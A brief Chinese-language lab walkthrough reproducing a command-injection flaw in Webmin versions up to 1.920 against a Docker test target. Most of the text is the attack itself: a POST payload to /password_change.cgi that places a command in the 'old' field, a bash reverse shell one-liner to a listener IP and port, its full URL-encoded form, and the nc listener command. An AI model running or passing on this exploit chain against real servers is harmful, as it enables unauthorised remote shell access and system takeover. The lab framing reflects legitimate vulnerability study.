Webmin是功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。Webmin支持绝大多数的Unix系统,这些系统除了各种版本的linux以外还包括:AIX、HPUX、Solaris、Unixware、Irix和FreeBSD等。
影响版本:
webmin<=1.920
一、环境准备
利用dokcer启动靶场环境
二、漏洞复现
浏览器访问地址:192.168.125.130:10000
使用https://协议访问
开启抓包
这里是post方式传输,将接口换成:/password_change.cgi
使用下面的poc:
user=roottext1&old=ls&new1=test2&new2=test2,点击send
漏洞复现完成
三、getshell
反弹shell
使用URL编码将下面命令进行编码:
bash -c "bash -i >& /dev/tcp/192.168.125.130/9999 0>&1"
URL编码后:
%62%61%73%68%20%2d%63%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%32%35%2e%31%33%30%2f%39%39%39%39%20%30%3e%26%31%22
在kali虚拟机使用命令:nc -lvp 9999开启监听,同时将上面的编码值替换之前old参数处的数值:
反弹shell成功